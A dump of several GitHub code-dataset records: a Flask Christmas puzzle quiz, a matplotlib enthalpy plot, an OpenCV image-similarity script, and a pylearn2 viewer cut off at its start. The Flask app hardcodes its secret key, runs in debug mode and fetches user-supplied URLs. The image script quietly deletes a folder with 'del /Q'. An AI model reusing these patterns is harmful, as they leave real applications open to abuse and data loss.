CourseStatus.LIVE)\n", "repo_name": "DigitalCampus/django-oppia", "sub_path": "tests/oppia/views/test_app_launch_activity.py", "file_name": "test_app_launch_activity.py", "file_ext": "py", "file_size_in_byte": 2719, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 17, "dataset": "github-code", "pt": "53", "api": [{"api_name": "oppia.test.OppiaTestCase", "line_number": 11, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 28, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 34, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 42, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 49, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 56, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 63, "usage_type": "call"}, {"api_name": "tests.utils.update_course_status", "line_number": 64, "usage_type": "call"}, {"api_name": "oppia.models.CourseStatus.DRAFT", "line_number": 64, "usage_type": "attribute"}, {"api_name": "oppia.models.CourseStatus", "line_number": 64, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 66, "usage_type": "argument"}, {"api_name": "tests.utils.update_course_status", "line_number": 69, "usage_type": "call"}, {"api_name": "oppia.models.CourseStatus.LIVE", "line_number": 69, "usage_type": "attribute"}, {"api_name": "oppia.models.CourseStatus", "line_number": 69, "usage_type": "name"}]} +{"seq_id": "30547087142", "text": "import datetime\r\nimport random\r\nimport re\r\nimport string\r\n\r\nfrom bs4 import BeautifulSoup\r\nfrom flask import Flask\r\nfrom flask import redirect\r\nfrom flask import render_template\r\nfrom flask import request\r\nfrom flask import session\r\nfrom flask import url_for\r\nfrom flask_mail import Mail\r\nfrom flask_mail import Message\r\nfrom flask_session import Session\r\nimport requests\r\n\r\napp = Flask(__name__)\r\napp.secret_key = b'_5#y2L\"F4Q8z\\n\\xec]/'\r\napp.config['SESSION_TYPE'] = 'filesystem'\r\nSession(app)\r\nmail = Mail(app)\r\n\r\n\r\nSTRING_OPTIONS = string.ascii_uppercase + string.ascii_lowercase + string.digits\r\n\r\ndef random_string():\r\n return ''.join(random.choices(STRING_OPTIONS, k=100))\r\n\r\nq11_string = random_string()\r\nq11_datetime = datetime.datetime.now()\r\n\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('1.html')\r\n\r\n@app.route('/2/')\r\ndef two():\r\n return 'Now go to the next page.'\r\n\r\n@app.route('/3/')\r\ndef three():\r\n return render_template('3.html')\r\n\r\n@app.route('/4/')\r\ndef four():\r\n volume = request.args.get('volume')\r\n if volume in ('11', 'eleven'):\r\n return 'Correct. Move on the next question by subtracting its number from 37.'\r\n if volume == 'quiet':\r\n return \"I can't hear you.\"\r\n if volume == 'loud':\r\n return \"That's better, but let's go full Spinal Tap for the win.\"\r\n if volume:\r\n return 'Eh?'\r\n if not volume:\r\n return \"No I don't think that's going to work.\"\r\n\r\n@app.route('/6/')\r\ndef six():\r\n return \"No cheating just like that.\"\r\n\r\n@app.route('/7/')\r\ndef seven():\r\n return \"No cheating just like that.\"\r\n\r\n@app.route('/8/')\r\ndef eight():\r\n return \"No cheating just like that.\"\r\n\r\n\r\n@app.route('/32/')\r\ndef q5():\r\n return render_template('q5.html')\r\n\r\n@app.route('/2398u4qesfhoiasdhf9a8sdyr983ruiwheasuhdiausdhf/')\r\ndef q5_question():\r\n if 'count' in session:\r\n session['count'] += 1\r\n else:\r\n session['count'] = 0\r\n \r\n if session['count'] == 13:\r\n session.clear()\r\n return render_template('q5-correct.html')\r\n return render_template('q5-question.html')\r\n\r\n@app.route('/29uqwoenrqwkehjr0384uho3u4ihj3odfgsdfgisdufgoi/', methods=['GET'])\r\ndef q6_question():\r\n return render_template('q6-question.html')\r\n\r\n@app.route('/29uqwoenrqwkehjr0384uho3u4ihj3odfgsdfgisdufgoi/', methods=['POST'])\r\ndef q6_question_submit():\r\n if 'answer' in request.form and request.form['answer'] == '60c6fa6f0974eb79069d1391dbd850f3e16b265e':\r\n return render_template('q6-correct.html')\r\n\r\n return render_template('q6-question.html', message=\"No, I don't think so.\")\r\n\r\n@app.route('/oi4j563ioj12iu34h1i2u3hv4k1j3k513hg5234h5i234uh5i2/', methods=['GET'])\r\ndef q7_question():\r\n return render_template('q7-question.html')\r\n\r\n@app.route('/oi4j563ioj12iu34h1i2u3hv4k1j3k513hg5234h5i234uh5i2/', methods=['DELETE'])\r\ndef q7_question_submit():\r\n return 'Very good. Now load {} (in your browser is fine)'.format(url_for('q8', _external=True))\r\n\r\n@app.route('/94859dgksjdfhgo324uy5235gbjhasdfh34h5k34jh53k4jh5wu/', methods=['GET'])\r\ndef q8():\r\n return render_template('q8-question.html')\r\n\r\n\r\n@app.route('/94859dgksjdfhgo324uy5235gbjhasdfh34h5k34jh53k4jh5wu/', methods=['POST'])\r\ndef q8_submit():\r\n if 'answer' in request.form:\r\n if request.form['answer'] == '260549':\r\n return render_template('q8-correct.html')\r\n\r\n if re.match(r'[\\dABCDEF]{6}', request.form['answer']):\r\n\r\n return render_template('q8-question.html', colour=request.form['answer'])\r\n else:\r\n return render_template('q8-question.html', gibberish=True)\r\n\r\n else:\r\n return render_template('q8-question.html')\r\n\r\n@app.route('/gfhc6i765ic5645365edhgfhgdsdtrs54ew54wsgvfkuty78t87t/')\r\ndef q9():\r\n return render_template('q9.html')\r\n\r\n@app.route('/aksljdfwiejroisjdfoasidhfoasiuhdfaioushdfoasidfjoaisdjf/')\r\ndef q9_correct():\r\n return render_template('q9-correct.html')\r\n\r\n@app.route('/23u4qwehnlkasdjf09uw34riasheoirh23k4j5ki34h5234h5k23j4h5/')\r\ndef q10():\r\n if 'Trident' in request.headers['user-agent']:\r\n return render_template('q10-correct.html', answer_string=q11_string)\r\n return render_template('q10-question.html')\r\n\r\n\r\n@app.route('/return-to-sender-really-quickly/')\r\ndef q11():\r\n global q11_string\r\n global q11_datetime\r\n if request.args.get('answer') and request.args.get('answer') == q11_string \\\r\n and (datetime.datetime.now() - q11_datetime) < datetime.timedelta(seconds=15): ## Change time to something suitable!\r\n\r\n q11_datetime = datetime.datetime.now()\r\n q11_string = random_string()\r\n\r\n return 'HERE IT IS: {}'.format(url_for('q12', _external=True))\r\n\r\n q11_string = random_string()\r\n g11_datetime = datetime.datetime.now()\r\n\r\n return q11_string\r\n \r\n\r\n@app.route('/aosidfjoijwernhkwerobisdfoghj34itjh345jhwoiu45y35/', methods=['GET', 'POST'])\r\ndef q12():\r\n if 'mstring' not in session:\r\n session['mstring'] = ''\r\n\r\n if 'input' not in request.form:\r\n return render_template('q12-question.html', mstring=session['mstring'])\r\n\r\n input_value = request.form['input']\r\n\r\n if not re.match(r'(https?:\\/\\/)?(www\\.)?[-a-zA-Z0-9@:%._\\+~#=]{2,256}\\.[a-z]{2,6}\\b([-a-zA-Z0-9@:%_\\+.~#?&//=]*)', input_value):\r\n return render_template('q12-question.html', mstring=session['mstring'], message=\"That's not gonna work!\")\r\n\r\n if 'wikipedia.org' not in input_value:\r\n return render_template('q12-question.html', mstring=session['mstring'], message=\"It's the right idea, but you need a certain 'Hawaiian velocity'?!\")\r\n\r\n \r\n if re.search(r'wikipedia.org\\/wiki\\/\\w{1}$', input_value):\r\n return render_template('q12-question.html', mstring=session['mstring'], message=\"No triviality...\")\r\n\r\n\r\n resp = requests.get(input_value)\r\n\r\n if resp.status_code != 200:\r\n return render_template('q12-question.html', mstring=session['mstring'], message=\"Something bad with that one...\")\r\n\r\n soup = BeautifulSoup(resp.text, 'html.parser')\r\n title_string = soup.title.string\r\n\r\n if title_string.lower().startswith('space'):\r\n session['mstring'] += ' '\r\n return render_template('q12-question.html', mstring=session['mstring'], message=\"You discovered the spacebar!\")\r\n\r\n if title_string.lower().startswith('delete'):\r\n if len(session['mstring']) > 0:\r\n session['mstring'] = session['mstring'][:-1]\r\n return render_template('q12-question.html', mstring=session['mstring'], message=\"You discovered backspace!\")\r\n\r\n\r\n char = title_string[0].lower()\r\n session['mstring'] += char\r\n\r\n if session['mstring'] in ('merry christmas', 'happy christmas', 'happy xmas'):\r\n return redirect(url_for('win'))\r\n\r\n\r\n print(\"'\" + session['mstring'] + \"'\")\r\n return render_template('q12-question.html', mstring=session['mstring'], message=\"Voilà. Keep going!\")\r\n \r\n\r\n@app.route('/onthefirstdayofchristmasmytruelovegavetomeonenicelovelypintofbeerandacoupleofpacketsofcrisps/', methods=['GET', 'POST'])\r\ndef win():\r\n if 'name' in request.form:\r\n msg = Message(\"Quiz winner!\",\r\n sender=\"from@xmasquiz.ed.ac.uk\",\r\n recipients=[\"richard.hadden@ed.ac.uk\"])\r\n msg.body = '{} has won the quiz!'.format(request.form['name'])\r\n mail.send(msg)\r\n return render_template('win.html', show_form=False)\r\n\r\n return render_template('win.html', show_form=True)\r\n\r\n\r\n\r\n@app.errorhandler(404)\r\ndef page_not_found(e):\r\n return \"It looks like that didn't work. Try hitting back.\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)", "repo_name": "oculardexterity/xmasquiz", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 7634, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 18, "usage_type": "call"}, {"api_name": "flask_session.Session", "line_number": 21, "usage_type": "call"}, {"api_name": "flask_mail.Mail", "line_number": 22, "usage_type": "call"}, {"api_name": "string.ascii_uppercase", "line_number": 25, "usage_type": "attribute"}, {"api_name": "string.ascii_lowercase", "line_number": 25, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 25, "usage_type": "attribute"}, {"api_name": "random.choices", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 48, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 48, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 79, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 80, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 82, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 84, "usage_type": "name"}, {"api_name": "flask.session.clear", "line_number": 85, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 85, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 86, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 91, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 95, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 95, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 96, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 98, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 102, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 106, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 110, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 115, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 115, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 116, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 116, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 117, "usage_type": "call"}, {"api_name": "re.match", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 119, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 119, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 121, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 121, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 121, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 123, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 126, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 130, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 138, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 138, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 139, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 140, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 147, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 147, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 147, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 148, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 148, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 148, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 150, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 150, "usage_type": "attribute"}, {"api_name": "flask.url_for", "line_number": 153, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 156, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 156, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 163, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 164, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 166, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 166, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 167, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 167, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 169, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 169, "usage_type": "name"}, {"api_name": "re.match", "line_number": 171, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 172, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 172, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 175, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 175, "usage_type": "name"}, {"api_name": "re.search", "line_number": 178, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 179, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 179, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 182, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 185, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 185, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 187, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 191, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 192, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 192, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 195, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 196, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 197, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 197, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 201, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 203, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 204, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 204, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 207, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 208, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 208, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 213, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 213, "usage_type": "name"}, {"api_name": "flask_mail.Message", "line_number": 214, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 217, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 217, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 219, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 221, "usage_type": "call"}]} +{"seq_id": "72428288489", "text": "\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\n\nplt.rcParams['figure.figsize'] = (7, 6)\nplt.rcParams['axes.linewidth'] = 3\nplt.rc('xtick', labelsize=18)\nplt.rc('ytick', labelsize=18)\nplt.rc('axes', labelsize=18)\nplt.rc('legend', fontsize=16)\nplt.rcParams['lines.markersize'] = 10\nplt.rcParams['lines.linewidth'] = 3\nplt.rcParams['xtick.direction'] = 'in'\nplt.rcParams['ytick.direction'] = 'in'\nplt.rcParams['xtick.major.size'] = 10\nplt.rcParams['xtick.major.width'] = 2\nplt.rcParams['ytick.major.size'] = 10\nplt.rcParams['ytick.major.width'] = 2\nplt.rcParams['legend.edgecolor'] = 'k'\nplt.rcParams['axes.unicode_minus'] = False\nplt.rcParams[\"legend.framealpha\"] = 1\nplt.rcParams['xtick.major.pad'] = 8\nplt.rcParams['ytick.major.pad'] = 8\nplt.rcParams['legend.handletextpad'] = 0.2\nplt.rcParams['legend.columnspacing'] = 0.1\nplt.rcParams['legend.labelspacing'] = 0.1\nplt.rcParams['legend.title_fontsize'] = 14\nplt.rcParams['axes.formatter.limits'] = (-3, 6)\n\n\ncolormap = plt.cm.Dark2\ncolors = [colormap(i) for i in np.linspace(0, 1, 4)]\n\ngs = gridspec.GridSpec(nrows=1, ncols=1)\ngs.update(wspace=0.4, hspace=0.4)\n\nax0 = plt.subplot(gs[0, 0])\n\nold_hf_CHCH=12.8\nhf_CH_singlebond_CH=np.array([97.3,62.3])\nhf_CH_doublebond_CH=np.array([10.5,79.8])\n\nold_hf_CCH=128.0\nhf_C_doublebond_CH=np.array([173.5, 10.5])\nhf_C_singlebond_CH=np.array([156.9,-79.6])\n\nold_hf_CC=210.4\nhf_C_doublebond_C=np.array([303.7,-26.0])\nhf_C_singlebond_C=np.array([183.5,-188.5])\n\nno=[0,1,2]\n\nax0.set_xlim([-0.5,2.5])\nax0.set_ylim([-40,100])\nax0.set_ylabel('$\\mathrm{\\Delta\\Delta_fH\\ (kJ\\,mol^{-1})}$') \nax0.set_xticks([0,1,2])\nax0.set_xticklabels(['$\\mathrm{^*CH^*CH}$','$\\mathrm{^*C^*CH}$','$\\mathrm{^*C^*C}$'])\n#ax0.legend()\n\nax0.plot((-0.5,3),(0,0),linestyle='solid',color='k')\n\n#ax0.bar(no[0],old_hf_CHCH, width=0.2,color=colors[0], edgecolor='k', label='$\\mathrm{\\overline{|\\Delta\\Delta_fH|}}$')\nax0.bar(no[0]-0.1,hf_CH_singlebond_CH[0]-old_hf_CHCH, width=0.2,color=colors[0], edgecolor='k', label='$\\mathrm{\\overline{|\\Delta\\Delta_fH|}}$')\nax0.bar(no[0]+0.1,hf_CH_doublebond_CH[0]-old_hf_CHCH, width=0.2,color=colors[0], edgecolor='k', label='$\\mathrm{\\overline{|\\Delta\\Delta_fH|}}$')\n\n\n\n#ax0.bar(no[1],old_hf_CCH, width=0.2,color=colors[1], edgecolor='k', label='$\\mathrm{\\overline{|\\Delta\\Delta_fH|}}$')\nax0.bar(no[1]-0.1,hf_C_doublebond_CH[0]-old_hf_CCH, width=0.2,color=colors[1], edgecolor='k', label='$\\mathrm{\\overline{|\\Delta\\Delta_fH|}}$')\nax0.bar(no[1]+0.1,hf_C_singlebond_CH[0]-old_hf_CCH, width=0.2,color=colors[1], edgecolor='k', label='$\\mathrm{\\overline{|\\Delta\\Delta_fH|}}$')\n\n#ax0.bar(no[2],old_hf_CC, width=0.2,color=colors[2], edgecolor='k', label='$\\mathrm{\\overline{|\\Delta\\Delta_fH|}}$')\nax0.bar(no[2]-0.1,hf_C_doublebond_C[0]-old_hf_CC, width=0.2,color=colors[2], edgecolor='k', label='$\\mathrm{\\overline{|\\Delta\\Delta_fH|}}$')\nax0.bar(no[2]+0.1,hf_C_singlebond_C[0]-old_hf_CC, width=0.2,color=colors[2], edgecolor='k', label='$\\mathrm{\\overline{|\\Delta\\Delta_fH|}}$')\n\nplt.savefig('resonance.pdf', bbox_inches='tight',transparent=False)", "repo_name": "bjkreitz/CBH-thermo", "sub_path": "Figures/resonance.py", "file_name": "resonance.py", "file_ext": "py", "file_size_in_byte": 3100, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.rcParams", "line_number": 7, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 8, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rc", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 9, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rc", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rc", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rc", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 13, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 14, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 15, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 16, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 17, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 18, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 19, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 20, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 21, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 22, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 23, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 24, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 25, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 26, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 27, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 28, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 29, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 30, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 33, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}]} +{"seq_id": "15571120079", "text": "import os\nimport shutil\nimport sys\nimport cv2\nfrom PIL import Image\n\ndef gethist(im):\n res_hist = cv2.calcHist([im], [0, 1, 2], None, [8, 8, 8], [0, 256, 0, 256, 0, 256])\n res_hist = cv2.normalize(res_hist, res_hist).flatten()\n return res_hist\n\ndef get_hist_sim(im1, im2):\n hist1 = gethist(im1)\n hist2 = gethist(im2)\n\n return cv2.compareHist(hist1, hist2, cv2.HISTCMP_CORREL) # higher == more similar\n\ndef main():\n if len(sys.argv) < 3:\n print(\"Wrong syntax\")\n return\n in_file = sys.argv[1]\n foldername = sys.argv[2]\n # print(f'{in_file = } \\t {foldername = }')\n cmpimg = cv2.imread(in_file)\n # print('reading in_file image complete!')\n for imgfilename in sorted(os.listdir(foldername), key=lambda x: int(x.removeprefix('frame').removesuffix('.jpg'))):\n im2 = cv2.imread(os.path.join(foldername, imgfilename))\n # print(f'reading {imgfilename} image complete!')\n sim = get_hist_sim(cmpimg, im2)\n print(f'Similarity between {in_file} and {imgfilename} is %.4f' % sim)\n\n\nTHRESHOLD = 0.6\ndef main2():\n pth = 'BigTests'\n fldrs = [ os.path.join(pth, f) for f in os.listdir(pth) ]\n\n for foldername in fldrs:\n li = os.listdir(foldername)\n fldrs2 = [ os.path.join(foldername, x) for x in li ]\n chkimg = list(filter(lambda x: '.jpg' in x, fldrs2))[0]\n im = cv2.imread(chkimg)\n for fld in fldrs2:\n if '.jpg' not in fld:\n fldrs3 = [ os.path.join(fld, y) for y in os.listdir(fld) ]\n for imm in fldrs3:\n im2 = cv2.imread(imm)\n if im is not None:\n if get_hist_sim(im, im2) > THRESHOLD:\n print(f'Removing {imm}')\n try:\n # hardcoded as of now\n shutil.move(imm, './toremove')\n except Exception as e:\n os.system('del /Q toremove')\n shutil.move(imm, './toremove')\n else:\n print('[error] im is None')\n \n\n\nif __name__ == '__main__':\n main()", "repo_name": "Elwin-J/Vid-Slide-Extractor", "sub_path": "imgcmpfolder.py", "file_name": "imgcmpfolder.py", "file_ext": "py", "file_size_in_byte": 2202, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.calcHist", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.normalize", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.compareHist", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.HISTCMP_CORREL", "line_number": 16, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 19, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 25, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 37, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 48, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 54, "usage_type": "call"}, {"api_name": "os.system", "line_number": 56, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "5651919932", "text": "#! /usr/bin/env python\n\n\"\"\"\nInteractive viewer for the convolutional weights in a pickled model.\n\nUnlike ./show_weights, this shows one unit's weights at a time. This\nallows it to display weights from higher levels (which can have 100s\nof input channels), not just the first.\n\"\"\"\n\nimport os\nimport sys\nimport warnings\nimport argparse\nimport numpy\nfrom pylearn2.models.mlp import MLP, ConvElemwise, CompositeLayer\nfrom pylearn2.models.maxout import MaxoutConvC01B\nfrom pylearn2.utils import safe_zip, serial\nfrom pylearn2.space import Conv2DSpace\n\ntry:\n from matplotlib import pyplot\nexcept ImportError as import_error:\n warnings.warn(\"Can't use this script without matplotlib.\")\n pyplot = None\n\n\ndef 